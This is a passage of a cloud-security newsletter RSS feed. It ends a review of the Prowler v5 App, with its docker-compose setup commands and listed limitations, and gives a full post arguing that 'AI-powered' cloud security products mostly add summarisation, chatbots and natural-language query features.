will persist.)</i></p><p class="paragraph" style="text-align:left;">Unlike the dashboard feature, which you can spin up with just the <code>prowler dashboard</code> command, the Prowler App is a <a class="link" href="https://docs.prowler.com/projects/prowler-open-source/en/latest/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=what-s-new-in-prowler-v5#prowler-app-installation" target="_blank" rel="noopener noreferrer nofollow">multi-container docker-compose file</a> you&#39;ll need to download and setup.</p><div class="codeblock"><pre><code>curl -LO https://raw.githubusercontent.com/prowler-cloud/prowler/refs/heads/master/docker-compose.yml
curl -LO https://raw.githubusercontent.com/prowler-cloud/prowler/refs/heads/master/.env
docker compose up -d</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/8d29e60a-a46b-4c0a-b67f-d2e30073539f/image.png?t=1736924405"/><div class="image__source"><span class="image__source_text"><p>Prowler App Dashboard</p></span></div></div><p class="paragraph" style="text-align:left;">You can self-host it. Connect your cloud accounts & Kubernetes clusters to it. Start scanning and securing.</p><p class="paragraph" style="text-align:left;">Features of Prowler App:</p><ul><li><p class="paragraph" style="text-align:left;"><b>Supports multi-user and RBAC</b> - Adds authentication and authorization layer view findings or manage settings. Users can be assigned roles. (<a class="link" href="https://roadmap.prowler.com/p/connector-sso-with-saml?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=what-s-new-in-prowler-v5" target="_blank" rel="noopener noreferrer nofollow">SSO Connectors</a> that are currently on their roadmap will be a great feature if released to OSS Prowler)</p></li><li><p class="paragraph" style="text-align:left;"><b>Pretty good dashboard</b> - Filters out findings based on accounts and scan IDs, check your compliance status against multiple frameworks, etc</p></li><li><p class="paragraph" style="text-align:left;"><b>Stores the findings in Postgres DB</b> - Interacting with the DB is unnecessary, but if you&#39;re into connecting data to BI tools in your org, this can help you.</p></li><li><p class="paragraph" style="text-align:left;"><b>Periodic scanning and diff between scans out of the box</b> - Once you connect your cloud accounts and initiate a scan, it will automatically be configured to scan every 24 hours. You also have a filter to find the delta between scans.</p></li><li><p class="paragraph" style="text-align:left;"><b>Documented APIs to interact</b> - If you have any use case where you need to interact with Prowler findings programmatically, then APIs can be the way to go.</p></li><li><p class="paragraph" style="text-align:left;"><b>Supports dark mode</b> - If you&#39;re into switching on dark modes across the apps you use, then this is for you 😛</p></li></ul><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/c89114c0-33f0-4a3e-be21-c043b4c2d23c/image.png?t=1736924430"/><div class="image__source"><span class="image__source_text"><p>Prowler App’s Delta Feature</p></span></div></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/c8b42e6f-785d-45cc-ae3f-ebe57fccd9be/image.png?t=1736924457"/><div class="image__source"><span class="image__source_text"><p>Prowler App’s Compliance Dashboard</p></span></div></div><h2 class="heading" style="text-align:left;" id="should-you-upgrade">Should You Upgrade?</h2><p class="paragraph" style="text-align:left;">Well, if you use Prowler CLI, I highly recommend to upgrade. You have new checks (including GenAI checks), fixers, and bug fixes.</p><p class="paragraph" style="text-align:left;">If you want to try the Prowler App, you don’t need to upgrade your CLI. You can download the docker-compose file and set up the app.</p><p class="paragraph" style="text-align:left;">If you are trying out the Prowler App, I need to make you aware of the following:</p><ul><li><p class="paragraph" style="text-align:left;">You can&#39;t onboard all your AWS accounts under AWS Organization at once. Instead, you have to connect one account at a time.</p></li><li><p class="paragraph" style="text-align:left;">The option to export the findings is not available. The same goes for options to mute or mark as false positive.</p></li><li><p class="paragraph" style="text-align:left;">You can&#39;t change the scanning schedule—a fixed schedule of 24 hours per account.</p></li><li><p class="paragraph" style="text-align:left;">Anyone who can access the app can sign up for an account. There is no option to turn off that feature.</p></li><li><p class="paragraph" style="text-align:left;">The default configuration scans across all your AWS regions. It doesn&#39;t support mutelists on the UI yet.</p></li><li><p class="paragraph" style="text-align:left;">Doesn’t support sending alerts to Slack/Microsoft Teams.</p></li><li><p class="paragraph" style="text-align:left;">Prowler App containers (especially the Django container) are resource-hungry. The CPU spiked up to 200% during the initialization, and the containers used 4GB of RAM on my Macbook. The CPU usage dropped once the initialization completed, but RAM was hovering above the 3GB mark.</p></li></ul><p class="paragraph" style="text-align:left;">Most issues I mentioned are on <a class="link" href="https://roadmap.prowler.com/roadmap?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=what-s-new-in-prowler-v5" target="_blank" rel="noopener noreferrer nofollow">Prowler&#39;s roadmap</a> or are actively being fixed. </p><p class="paragraph" style="text-align:left;">I predict that Prowler App, in a few releases, will become a robust self-hostable CSPM platform.</p><p class="paragraph" style="text-align:left;">Until next time 👋</p><div class="section" style="background-color:transparent;margin:0.0px 0.0px 0.0px 0.0px;padding:0.0px 0.0px 0.0px 0.0px;"><div class="image"><a class="image__link" href="https://cal.com/badshah/discovery?user=badshah&utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=what-s-new-in-prowler-v5" rel="noopener" target="_blank"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/924c47ef-7ce0-4ff6-97a4-94f7bcf6b82d/image.png?t=1736925689"/></a><div class="image__source"><a class="image__source_link" href="https://cal.com/badshah/discovery?user=badshah&utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=what-s-new-in-prowler-v5" rel="noopener" target="_blank"><span class="image__source_text"><p>Let’s Connect!</p></span></a></div></div></div></div><div class='beehiiv__footer'><br class='beehiiv__footer__break'><hr class='beehiiv__footer__line'><a target="_blank" class="beehiiv__footer_link" style="text-align: center;" href="https://www.beehiiv.com/?utm_campaign=2315ff4c-3363-48be-9d29-2823ab92054e&utm_medium=post_rss&utm_source=cloud_security_club">Powered by beehiiv</a></div></div>
  ]]></content:encoded>
</item>

      <item>
  <title>So-Called AI-Powered Cloud Security</title>
  <description>...And What It Actually Delivers</description>
      <enclosure url="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/dab8b44f-179b-4570-89b7-697b4de5096d/AI-Powered_Cloud_Security.gif" length="978344" type="image/gif"/>
  <link>https://cloudsecurity.club/p/so-called-ai-powered-cloud-security</link>
  <guid isPermaLink="true">https://cloudsecurity.club/p/so-called-ai-powered-cloud-security</guid>
  <pubDate>Tue, 17 Dec 2024 12:00:00 +0000</pubDate>
  <atom:published>2024-12-17T12:00:00Z</atom:published>
    <dc:creator>Chandrapal Badshah</dc:creator>
    <category><![CDATA[Ai]]></category>
    <category><![CDATA[Cnapp]]></category>
  <content:encoded><![CDATA[
    <div class='beehiiv'><style>
  .bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
  .bh__table_cell { padding: 5px; background-color: #FFFFFF; }
  .bh__table_cell p { color: #2D2D2D; font-family: 'Helvetica',Arial,sans-serif !important; overflow-wrap: break-word; }
  .bh__table_header { padding: 5px; background-color:#F1F1F1; }
  .bh__table_header p { color: #2A2A2A; font-family:'Trebuchet MS','Lucida Grande',Tahoma,sans-serif !important; overflow-wrap: break-word; }
</style><div class='beehiiv__body'><p class="paragraph" style="text-align:left;"><b>TL;DR:</b></p><ul><li><p class="paragraph" style="text-align:left;">Vendors are slapping &quot;AI-powered&quot; on everything to get more attention (and possibly investments)</p></li><li><p class="paragraph" style="text-align:left;">What AI actually does in cloud security right now:</p><ul><li><p class="paragraph" style="text-align:left;"><i>Summarization:</i> Creates summaries of security findings with additional context like resources, tags, logs</p></li><li><p class="paragraph" style="text-align:left;"><i>Tailored Remediation: </i>Gives exact commands and IaC code to fix security issues</p></li><li><p class="paragraph" style="text-align:left;"><i>AI Chatbots:</i> Helps answer questions about findings and documentation</p></li><li><p class="paragraph" style="text-align:left;"><i>Rephrasing Findings: </i>Changes how issues are explained based on who&#39;s reading (engineers, business folks, compliance team)</p></li><li><p class="paragraph" style="text-align:left;"><i>Natural Language Features:</i> Turns language into automation tasks, security queries, and security policies</p></li></ul></li><li><p class="paragraph" style="text-align:left;"><b>Bottom line:</b> AI in cloud security is not matching up to the hype in the market right now - it&#39;s just making security tools easier to use instead of doing anything super technical or groundbreaking (though very few exceptions exist)</p></li></ul><hr class="content_break"><p class="paragraph" style="text-align:left;">I attended a security conference recently. One thing stood out - from CISOs to CXOs to vendors in the stalls.</p><p class="paragraph" style="text-align:left;">AI. AI. Fricking AI.</p><p class="paragraph" style="text-align:left;">Quantum security is picking up. Zero Trust is still present, as usual. But right now, the buzz is clearly AI.</p><p class="paragraph" style="text-align:left;">I heard all sorts of statements from the speakers.</p><p class="paragraph" style="text-align:left;">&quot;<i>Attackers are already using AI.</i>&quot;</p><p class="paragraph" style="text-align:left;">&quot;<i>Defenders must use AI</i>.&quot;</p><p class="paragraph" style="text-align:left;">“<i>The only way to fight AI is with AI.</i>”</p><p class="paragraph" style="text-align:left;">Also, I can’t help but notice the subtle endorsement of the vendors’ <a class="link" href="https://www.plerion.com/blog/please-buy-our-gen-v-humachine-cloud-security-solution?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">Gen-V AI-Powered Hyperscale Cloud Security Solutions</a>. </p><p class="paragraph" style="text-align:left;">AI Powered. AI Driven. AI Infused. Whatever.</p><p class="paragraph" style="text-align:left;">I’m not skeptical of new technology when I encounter it. But I’m wary of the people endorsing it (and possibly their intentions behind it). I double-check whether they are telling the truth, partial truths, or outright bluffing.</p><p class="paragraph" style="text-align:left;">So, after the conference, I dedicated my weekend to seeing how companies (vendors and customers) use this new AI technology and whether AI in cloud security is really a game-changer that lives up to the hype.</p><h1 class="heading" style="text-align:left;" id="whats-ai"><span style="color:rgb(67, 67, 67);">What&#39;s AI?</span></h1><p class="paragraph" style="text-align:left;">For beginners, let’s start with <b>Artificial Intelligence (AI)</b>.</p><p class="paragraph" style="text-align:left;">AI is a broader term for any computer system designed to mimic human intelligence.</p><p class="paragraph" style="text-align:left;"><b>Machine Learning (ML)</b> is a specific AI approach in which systems learn from data rather than following explicit rules. </p><p class="paragraph" style="text-align:left;"><b>Generative AI (GenAI)</b> is a broader category (within AI) that refers to any AI capable of generating new content. While <b>Large Language Models (LLMs)</b> can be used to create text-based GenAI applications, GenAI also includes image generation, music/audio creation, and other forms of content generation that don&#39;t necessarily use LLM technology.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/9987a42d-f70e-4220-80ec-50110094876e/image.png?t=1734428571"/><div class="image__source"><span class="image__source_text"><p>Source: <a class="link" href="https://medium.com/@fraidoonomarzai99/introduction-to-generative-ai-and-llm-in-depth-aaf4bb5546ff?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">https://medium.com/@fraidoonomarzai99/introduction-to-generative-ai-and-llm-in-depth-aaf4bb5546ff</a></p></span></div></div><p class="paragraph" style="text-align:left;">Now, if you label LLM, GenAI, and ML as AI, you can label many existing cloud security tools and services as AI-powered (without changing a single line of code).</p><p class="paragraph" style="text-align:left;">Amazon GuardDuty has been an AI-powered service for a few years now (even though its AI capabilities <a class="link" href="https://tracebit.com/blog/a-hard-look-at-guardduty-shortcomings?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">have some shortcomings</a>). </p><p class="paragraph" style="text-align:left;">Cloudflare has been <a class="link" href="https://developers.cloudflare.com/bots/reference/machine-learning-models/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">using AI to defend against bots</a> for a few years.</p><p class="paragraph" style="text-align:left;">Microsoft Sentinel took the initiative to <a class="link" href="https://techcommunity.microsoft.com/blog/microsoftsentinelblog/introduction-to-machine-learning-notebooks-in-microsoft-sentinel/3626534?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">democratize AI for Security Operations</a> in 2022 (even before this AI hype).</p><div class="blockquote"><blockquote class="blockquote__quote"></blockquote></div><h1 class="heading" style="text-align:left;" id="ai-in-cloud-security"><span style="color:rgb(67, 67, 67);">AI in Cloud Security</span></h1><p class="paragraph" style="text-align:left;">Vendors are at the forefront of innovation when it comes to using AI in cloud security. (Partly because they can raise more eyebrows and drive more investments).</p><p class="paragraph" style="text-align:left;">Reading public blog posts and examining the features of cloud security tools can give anyone an idea of how AI is used and what is working. </p><p class="paragraph" style="text-align:left;">Just because an AI feature is present doesn’t mean every customer uses it and finds value. However, it does show that AI might simplify specific tedious tasks and solve some problems.</p><p class="paragraph" style="text-align:left;">This blog post summarizes how AI is powering cloud security right now.</p><div class="blockquote"><blockquote class="blockquote__quote"></blockquote></div><h2 class="heading" style="text-align:left;" id="summarization">Summarization</h2><p class="paragraph" style="text-align:left;">LLMs are good at summarizing large texts. For them, the description of security findings is no different - just a set of words waiting to be summarized.</p><p class="paragraph" style="text-align:left;">Security tools (with the help of LLMs) can create summaries with additional contexts (such as the resource&#39;s name, tags, logs, etc) instead of a generic description stating, &quot;<i>The following assets are vulnerable to XYZ.</i>”</p><p class="paragraph" style="text-align:left;">The summarization is not helpful for more straightforward checks. An unencrypted database is just an unencrypted database, no matter how you summarize it.</p><p class="paragraph" style="text-align:left;">However, the summarization feature is a bit useful when dealing with complex findings like:</p><ul><li><p class="paragraph" style="text-align:left;">multiple low-severity findings chained to form higher-severity ones</p></li><li><p class="paragraph" style="text-align:left;">issues across multiple cloud and identity platforms synergizing to create misconfigurations</p></li><li><p class="paragraph" style="text-align:left;">anomalies detected using logs from multiple sources (endpoints, applications, etc.)</p></li></ul><p class="paragraph" style="text-align:left;">The summary relates different issues and gives a high-level overview of the findings.</p><h2 class="heading" style="text-align:left;" id="tailored-remediation">Tailored Remediation</h2><p class="paragraph" style="text-align:left;">Just like summarization includes your asset & findings data as part of the output, LLM-generated remediation steps give you exact instructions for remediating misconfigurations.</p><p class="paragraph" style="text-align:left;">There are no more placeholders. </p><p class="paragraph" style="text-align:left;">If your S3 bucket is misconfigured, AI provides the exact AWS CLI commands to secure it, along with prefilled information like the bucket name and region.</p><p class="paragraph" style="text-align:left;">A seemingly significant advantage is when the remediation needs changes in IaC repos - Cloudformation, Terraform, etc. AI-generated code might save time for users (especially developers) as they can copy and paste the remediation steps.</p><p class="paragraph" style="text-align:left;">Can IaC scanners help with remediation instead of relying on AI-generated code? I think it can be.</p><p class="paragraph" style="text-align:left;">Wiz seems to have <a class="link" href="https://www.wiz.io/blog/introducing-ai-powered-remediation-2-0?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">improved this use case</a> a bit. Wiz now dynamically suggests the best remediation strategy based on the risks identified. Suppose there’s a toxic combination (multiple low-severity bugs synergizing to form higher-severity attack paths). In that case, Wiz seems to use AI to strategize the best and minimal remediation you can do to break the combination.</p><p class="paragraph" style="text-align:left;">Another interesting example is <a class="link" href="https://orca.security/resources/blog/multi-cloud-support-iam-policy-optimizer/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">Orca’s IAM Policy Optimizer</a>. This feature uses AI to find the best possible remediation for overprivileged roles while considering security and long-term operability.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/7cbd1001-f010-438b-a49a-94b137eb2087/image.png?t=1734428673"/><div class="image__source"><span class="image__source_text"><p>Orca’s IAM Policy Optimizer. <br>Source: <a class="link" href="https://orca.security/resources/blog/multi-cloud-support-iam-policy-optimizer/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">https://orca.security/resources/blog/multi-cloud-support-iam-policy-optimizer/</a></p></span></div></div><h2 class="heading" style="text-align:left;" id="ai-chatbots">AI Chatbots</h2><p class="paragraph" style="text-align:left;">Almost every Cloud Security vendor has a chatbot integrated now:</p><ul><li><p class="paragraph" style="text-align:left;"><a class="link" href="https://www.lacework.com/platform/lacework-ai-assist?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">Lacework AI Assist </a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="https://www.sentinelone.com/platform/purple/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">SentinelOne Purple AI</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="https://docs.sysdig.com/en/docs/sysdig-secure/sage/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">Sysdig Sage</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="https://www.crowdstrike.com/falcon-platform/artificial-intelligence-and-machine-learning/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">CrowdStrike Charlotte AI</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="https://www.paloaltonetworks.com/blog/prisma-cloud/copilot/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">Prisma Cloud Copilot</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="https://www.accuknox.com/wp-content/uploads/Ask-Ada-Ebook.pdf?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">Accunox Ask Ada</a></p></li></ul><p class="paragraph" style="text-align:left;">In simple terms, these chatbots integrate the natural language processing capabilities of LLMs (like Claude) and the context of your cloud (assets, findings, logs, misconfigurations, etc). </p><p class="paragraph" style="text-align:left;">If you want to know more about a finding, you can ask the chatbot directly (instead of copying the finding to ChatGPT/ClaudeAI). These chatbots reply to your queries just like a knowledgeable peer would.</p><p class="paragraph" style="text-align:left;">Example chatbot queries:</p><ul><li><p class="paragraph" style="text-align:left;">Why does this finding matter? </p></li><li><p class="paragraph" style="text-align:left;">What’s the best way to fix this? </p></li><li><p class="paragraph" style="text-align:left;">What policies do you support (based on the tool’s documentation)?</p></li><li><p class="paragraph" style="text-align:left;">Explain about baselines and how to configure CIS baselines.</p></li><li><p class="paragraph" style="text-align:left;">What’s the current compliance status of XYZ Kubernetes cluster</p></li></ul><div class="blockquote"><blockquote class="blockquote__quote"><p class="paragraph" style="text-align:left;"><b>Note:</b> Every vendor’s chatbot can have different capabilities. Some chatbots might only access the tool’s documentation and the current findings. You can keep chatting with it and get disappointed to find the chatbot doesn’t know anything outside what’s already in the dashboard. But hey!, having just a dumb chatbot will still make a security product AI-powered. 🤑💰</p><figcaption class="blockquote__byline"></figcaption></blockquote></div><p class="paragraph" style="text-align:left;">Integrating an AI Chatbot has another advantage for cloud security tools with complex UIs. </p><p class="paragraph" style="text-align:left;">You don’t have to click the third option on the left navigation bar, scroll down, and make a few more clicks to understand your Kubernetes cluster&#39;s compliance score. </p><p class="paragraph" style="text-align:left;">You can just ask an AI Chatbot about it without navigation (saving you some time and brain cells). 🤓 </p><h2 class="heading" style="text-align:left;" id="rephrasing-findings">Rephrasing Findings</h2><p class="paragraph" style="text-align:left;">Every team speaks differently. </p><p class="paragraph" style="text-align:left;">You can’t just send a finding about an overprivileged IAM role to different teams and expect them to understand and prioritize the fix.</p><p class="paragraph" style="text-align:left;">With Engineering, you highlight the principle of least privilege and lateral movement if compromised.</p><p class="paragraph" style="text-align:left;">With Business, you highlight how exploiting it leads to data breaches and associated reputation damage and fines.</p><p class="paragraph" style="text-align:left;">With Risk & Compliance, you highlight how it might cause an audit finding or compliance risk. </p><p class="paragraph" style="text-align:left;">The rephrasing feature (<i>mostly part of AI Chatbots</i>) helps with it. Depending on the person and their team, the security tool can rephrase the findings to help them better understand.</p><p class="paragraph" style="text-align:left;">This feature&#39;s biggest bet (according to CNAPP providers) is that it <b>democratizes CloudSec tools</b>. Security teams should not use these tools in silos but rather share them with other teams that prioritize and remediate the findings. Different teams can then understand the issues & take action on them - making “<i>Security is Everyone’s Responsibility</i>” come true.</p><h2 class="heading" style="text-align:left;" id="natural-language-to-automation">Natural Language to Automation</h2><p class="paragraph" style="text-align:left;">When security vendors combine the chatbot with <a class="link" href="https://python.langchain.com/docs/concepts/agents/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">AI agents</a>, something interesting happens. </p><p class="paragraph" style="text-align:left;">AI agents can understand what you want from your natural language input and act on your behalf when required (e.g., invoking API, changing configuration, deploying tools, etc.).</p><p class="paragraph" style="text-align:left;">Scheduling weekly security scans doesn’t require you to click in multiple places.</p><p class="paragraph" style="text-align:left;">Tell the chatbot to do it.</p><p class="paragraph" style="text-align:left;">You don&#39;t need to look up the cron pattern to send an executive report on the current state of compliance on the first day of every month.</p><p class="paragraph" style="text-align:left;">Tell the chatbot; it will find it and set up the automation for you.</p><p class="paragraph" style="text-align:left;">Again, AI saves time used for navigation & clickops.</p><p class="paragraph" style="text-align:left;">Does it prevent the creation of the same automation multiple times? Can it delete existing automation and workflows, causing more harm than it can help?</p><p class="paragraph" style="text-align:left;">I don’t know yet. It’s very vendor’s chatbot specific.</p><h2 class="heading" style="text-align:left;" id="natural-language-to-query">Natural Language to Query</h2><p class="paragraph" style="text-align:left;">Every CNAPP vendor provides a proprietary query language or interface to query your cloud asset inventory. SIEM vendors are infamous for their proprietary query language to query logs.</p><p class="paragraph" style="text-align:left;">Proprietary stuff means you, as a security engineer or analyst, must learn how to use it. There’s a learning curve involved. </p><p class="paragraph" style="text-align:left;">You need to relearn every time you switch to a different org using a different tool.</p><p class="paragraph" style="text-align:left;">With AI integrated into the product, that’s a bit easy. You tell it what you want, and it creates the query for you and loads it into the security tool.</p><p class="paragraph" style="text-align:left;">I say it’s a “bit easy” and not “a problem solved by AI.”</p><p class="paragraph" style="text-align:left;">AI works well when creating simple queries, but with some complexity involved, it fails. Until AI solves this problem, you should learn the proprietary languages and ask the chatbot whenever you have a doubt (and hope it doesn’t hallucinate).</p><h2 class="heading" style="text-align:left;" id="natural-language-to-code-policy-gen">Natural Language to Code & Policy Generation</h2><p class="paragraph" style="text-align:left;">It is similar to Natural Language to Query conversion but for tools outside the CNAPP or SIEM.</p><p class="paragraph" style="text-align:left;">Example: natural language to <a class="link" href="https://www.openpolicyagent.org/docs/latest/policy-language/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">Rego</a>, <a class="link" href="https://docs.cedarpolicy.com/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">Cedar</a>, <a class="link" href="https://yara.readthedocs.io/en/stable/gettingstarted.html?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">Yara</a>, <a class="link" href="https://sigmahq.io/docs/guide/about.html?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">Sigma</a>, YAML, etc.</p><p class="paragraph" style="text-align:left;">ARMO uses GPT-3 to <a class="link" href="https://www.armosec.io/blog/armo-chatgpt-create-custom-controls-faster/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">convert natural language to Rego-based OPA policies</a>.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/57581109-fb7f-4843-b1c9-b23f7770ffa0/image.png?t=1734429445"/><div class="image__source"><span class="image__source_text"><p>Natural Language to Rego rule generation using GPT-3<br>Source: <a class="link" href="https://www.armosec.io/blog/armo-chatgpt-create-custom-controls-faster/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">https://www.armosec.io/blog/armo-chatgpt-create-custom-controls-faster/</a></p></span></div></div><h1 class="heading" style="text-align:left;" id="so-whats-a-ipowered-again">So, What&#39;s AI-powered, again?</h1><p class="paragraph" style="text-align:left;">Many security vendors have just integrated some sort of LLM and call their tools “AI Powered.” Their <i>AI capabilities</i> differ vastly from vendor to vendor.</p><p class="paragraph" style="text-align:left;">As you have seen, the <span style="text-decoration:line-through;">AI</span> LLM (and possibly underlying AI agents) in cloud security products are not doing anything groundbreaking (at least on the technical side). </p><p class="paragraph" style="text-align:left;">It&#39;s not automatically detecting more issues than non-AI counterparts. </p><p class="paragraph" style="text-align:left;">It’s not detecting additional assets or attack patterns (just summarizing what’s already detected.)</p><p class="paragraph" style="text-align:left;">It’s not matching up to the hype in the market right now.</p><p class="paragraph" style="text-align:left;">At maximum, AI is currently:</p><ul><li><p class="paragraph" style="text-align:left;"><b>Improving the UX and simplifying the UI of the security tool</b> (you don’t have to do clickops or search for the right option in the dropdown menu; just ask Chatbot to do it)</p></li><li><p class="paragraph" style="text-align:left;"><b>Summarizing and paraphrasing the findings</b> (same issue but different summary if you’re part of engineering or business)</p></li><li><p class="paragraph" style="text-align:left;"><b>Lowering the barrier for non-security folks to use cloud security tools</b> (just ask the chatbot for documentation, convert your sentence to query, ask for a custom Rego policy, etc.)</p></li></ul><p class="paragraph" style="text-align:left;">Speaking on the technical front, examples like natural language to policy and automation generation are good but not good enough (yet). </p><p class="paragraph" style="text-align:left;">Also, these natural-language-to-policy examples are intermittent events. I don’t think I (or others) will use this feature every day in a way that allows me to confidently say AI has saved me a substantial amount of time and effort (without learning the policy/query language). </p><p class="paragraph" style="text-align:left;">I would love to see more features tackling recurring problems (like <a class="link" href="https://orca.security/resources/blog/multi-cloud-support-iam-policy-optimizer/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">Orca’s IAM Policy Optimizer</a>) from other security vendors.</p><div class="blockquote"><blockquote class="blockquote__quote"></blockquote></div><p class="paragraph" style="text-align:left;">I didn’t mention hallucinations and the impact of faulty AI-generated summaries or remediation steps. Maybe that’s a topic for another day.</p><h1 class="heading" style="text-align:left;" id="moar-ai-moar-questions">Moar AI, Moar Questions</h1><p class="paragraph" style="text-align:left;">The more I read about AI power in Cloud Security products, the more questions I have. Here are a few I have in mind now:</p><p class="paragraph" style="text-align:left;">1. A good number of AI-powered CloudSec vendors also have AI-SPM capabilities. Are they dogfooding their AI-SPM capabilities to secure their AI features?</p><p class="paragraph" style="text-align:left;">2. Can AI take costly actions on your behalf and generate a bill? Something like Self-<a class="link" href="https://cloudsecurity.club/p/lets-talk-denial-of-wallet?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">Denial of Wallet</a>?</p><p class="paragraph" style="text-align:left;">3. If AI greatly simplifies the UX of CloudSec tools and reduces the bar so anyone can manage them, do Cloud Security vendor certifications (like <a class="link" href="https://www.paloaltonetworks.com/services/education/prisma-certified-cloud-security-engineer?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">PCCSE</a>) hold value? Will they even be required in the future?</p><p class="paragraph" style="text-align:left;">4. What’s the impact of hallucinations when chatbots reply with logs? What if the remediation isn’t a remediation, or if it creates another misconfiguration?</p><p class="paragraph" style="text-align:left;">5. What do access control and logging look like? Can an engineer with limited access get findings and information from different accounts using Chatbots? If the engineer uses AI to create automation in the security tool, how does it look in the logs?</p><p class="paragraph" style="text-align:left;">If you know answers to any of the above, please reach out to me on <a class="link" href="https://linkedin.com/in/bnchandrapal?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=so-called-ai-powered-cloud-security" target="_blank" rel="noopener noreferrer nofollow">LinkedIn</a> or email <a class="link" href="mailto:badshah@cloudsecurity.club" target="_blank" rel="noopener noreferrer nofollow">badshah@cloudsecurity.club</a></p><hr class="content_break"><p class="paragraph" style="text-align:left;"><b>P.S.</b> I&#39;m currently taking on select freelance projects related to securing AWS environments. If you or someone you know needs help securing cloud environments, I&#39;d love to chat! Just reply to this email or reach me at <a class="link" href="mailto:badshah@cloudsecurity.club" target="_blank" rel="noopener noreferrer nofollow">badshah@cloudsecurity.club</a>.</p></div><div class='beehiiv__footer'><br class='beehiiv__footer__break'><hr class='beehiiv__footer__line'><a target="_blank" class="beehiiv__footer_link" style="text-align: center;" href="https://www.beehiiv.com/?utm_campaign=49b3646c-7067-4e8d-b51a-3d14a0787bbd&utm_medium=post_rss&utm_source=cloud_security_club">Powered by beehiiv</a></div></div>
  ]]></content:encoded>
</item>

      <item>
  <title>What Does AWS Shield Standard Provide?</title>
